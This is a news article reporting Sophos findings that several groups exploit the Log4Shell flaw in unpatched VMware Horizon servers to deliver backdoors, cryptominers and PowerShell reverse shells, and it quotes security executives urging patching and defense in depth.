Attackers use the Log4Shell vulnerability to deliver backdoors and profiling scripts to unpatched VMware Horizon servers.
Cybersecurity company Sophos said that multiple adversaries are targeting vulnerable Horizon servers, paving the way for persistent access and future ransomware attacks.
Log4Shell is a remote code execution vulnerability in the Java logging component, Apache Log4J, embedded in hundreds of software products. The vulnerability was discovered and patched last December.
Amit Yoran, CEO of cybersecurity company Tenable, said that the Apache Log4j Remote Code Execution Vulnerability is the last decade’s single most significant, critical vulnerability.
“The discovery of this vulnerability is nothing short of a Fukushima moment for the cybersecurity industry.”
According to a senior security researcher at Sophos, Sean Gallagher, Sophos detections reveal waves of attacks targeting Horizon servers, starting in January, and delivering a range of backdoors and cryptominers to unpatched servers as scripts to collect some device information.
Widely used applications such as VMware Horizon exposed to the internet and need to be manually updated are particularly vulnerable to exploitation at scale. […] Log4J is installed in hundreds of software products. Many organizations may be unaware of the vulnerability lurking within their infrastructure, particularly in commercial, open-source, or custom software that doesn’t have regular security support,
Sophos believes that some of the backdoors may be delivered by Initial Access Brokers looking to secure persistent remote access to a high-value target that they can sell to other attackers, such as ransomware operators.
Sophos detected multiple attack payloads using Log4Shell to target vulnerable Horizon servers:
* Two legitimate remote monitoring and management tools, Atera agent and Splashtop Streamer, likely intended for malicious use as backdoors
* The malicious Sliver backdoor
* The cryptominers z0Miner, JavaX miner, Jin and Mimu
* Several PowerShell-based reverse shells that collect device and backup information
According to Sophos, the largest wave of attacks that began in mid-January 2022 executed the cryptominer installer script directly from the Apache Tomcat component of the VMware Horizon server. This wave of attacks is ongoing.
“Sophos’ findings suggest that multiple adversaries are implementing these attacks, so the most important protective step is to upgrade all devices and applications, including Log4J, with the patched version of the software. This includes patched versions of VMWare Horizon if organizations use the application in their network,” said Gallagher.
Patching is not enough as attackers might have already installed a web shell or backdoor in the network.
“Defense in depth and acting upon any detection of miners and other anomalous activity is critical to avoid falling victim to such attacks.”